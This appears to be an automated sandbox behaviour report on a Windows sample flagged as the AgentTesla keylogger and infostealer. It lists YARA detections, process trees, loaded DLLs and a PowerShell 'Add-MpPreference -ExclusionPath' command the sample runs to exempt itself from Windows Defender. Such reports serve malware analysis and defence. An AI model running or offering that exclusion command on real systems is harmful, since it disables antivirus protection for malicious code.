Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F97780	4_2_06F97780
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F92751	4_2_06F92751
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F9E490	4_2_06F9E490
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F95DCF	4_2_06F95DCF
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F90040	4_2_06F90040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_00D8D3A4	7_2_00D8D3A4
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_05568739	7_2_05568739
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_0556A798	7_2_0556A798
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_0556A7A8	7_2_0556A7A8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_0556B1B0	7_2_0556B1B0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_0556F318	7_2_0556F318
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_05568FA8	7_2_05568FA8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 7_2_05568B70	7_2_05568B70
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0181EA09	10_2_0181EA09
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_01814A68	10_2_01814A68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_01813E50	10_2_01813E50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_01814198	10_2_01814198
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_0181AC90	10_2_0181AC90
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F0415C	10_2_06F0415C
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F06A50	10_2_06F06A50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F05D68	10_2_06F05D68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F05D5A	10_2_06F05D5A
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F156B0	10_2_06F156B0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F13570	10_2_06F13570
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F1B307	10_2_06F1B307
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F17788	10_2_06F17788
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F15DD7	10_2_06F15DD7
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F10040	10_2_06F10040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F1003F	10_2_06F1003F
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0156D3A4	11_2_0156D3A4
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_05646698	11_2_05646698
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_05646688	11_2_05646688
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_05640040	11_2_05640040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_05640006	11_2_05640006
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0564EF28	11_2_0564EF28
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0564EF38	11_2_0564EF38
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0564EF00	11_2_0564EF00
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_02A6EA10	15_2_02A6EA10
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_02A64A68	15_2_02A64A68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_02A63E50	15_2_02A63E50
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_02A6AC90	15_2_02A6AC90
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_02A64198	15_2_02A64198
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069C415C	15_2_069C415C
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069C6A30	15_2_069C6A30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069C5D5B	15_2_069C5D5B
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069C5D68	15_2_069C5D68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D56B0	15_2_069D56B0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D66E0	15_2_069D66E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D7E68	15_2_069D7E68
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D3570	15_2_069D3570
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069DC268	15_2_069DC268
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069DB318	15_2_069DB318
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D7788	15_2_069D7788
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069DE498	15_2_069DE498
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D5DE8	15_2_069D5DE8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D0040	15_2_069D0040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069D003F	15_2_069D003F

Source: dhPWt112uC.exe, 00000000.00000000.1689490418.0000000000353000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCFss.exe6 vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1778647173.00000000027EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1778647173.000000000283E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1790792317.00000000072C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1777103060.000000000092E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1784185086.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs dhPWt112uC.exe
Source: dhPWt112uC.exe, 00000004.00000002.4162645748.0000000001339000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs dhPWt112uC.exe
Source: dhPWt112uC.exe	Binary or memory string: OriginalFilenameCFss.exe6 vs dhPWt112uC.exe

Source: dhPWt112uC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: dhPWt112uC.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: newapp.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/9@2/2

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhPWt112uC.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Mutant created: \Sessions\1\BaseNamedObjects\dPVmIzaDRidISKmqloneynbSFJ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb50sxt2.ug4.ps1

Jump to behavior

Source: dhPWt112uC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: dhPWt112uC.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dhPWt112uC.exe	Virustotal: Detection: 75%
Source: dhPWt112uC.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File read: C:\Users\user\Desktop\dhPWt112uC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process created: C:\Users\user\Desktop\dhPWt112uC.exe "C:\Users\user\Desktop\dhPWt112uC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: iphlpapi.dll	Jump to behavior
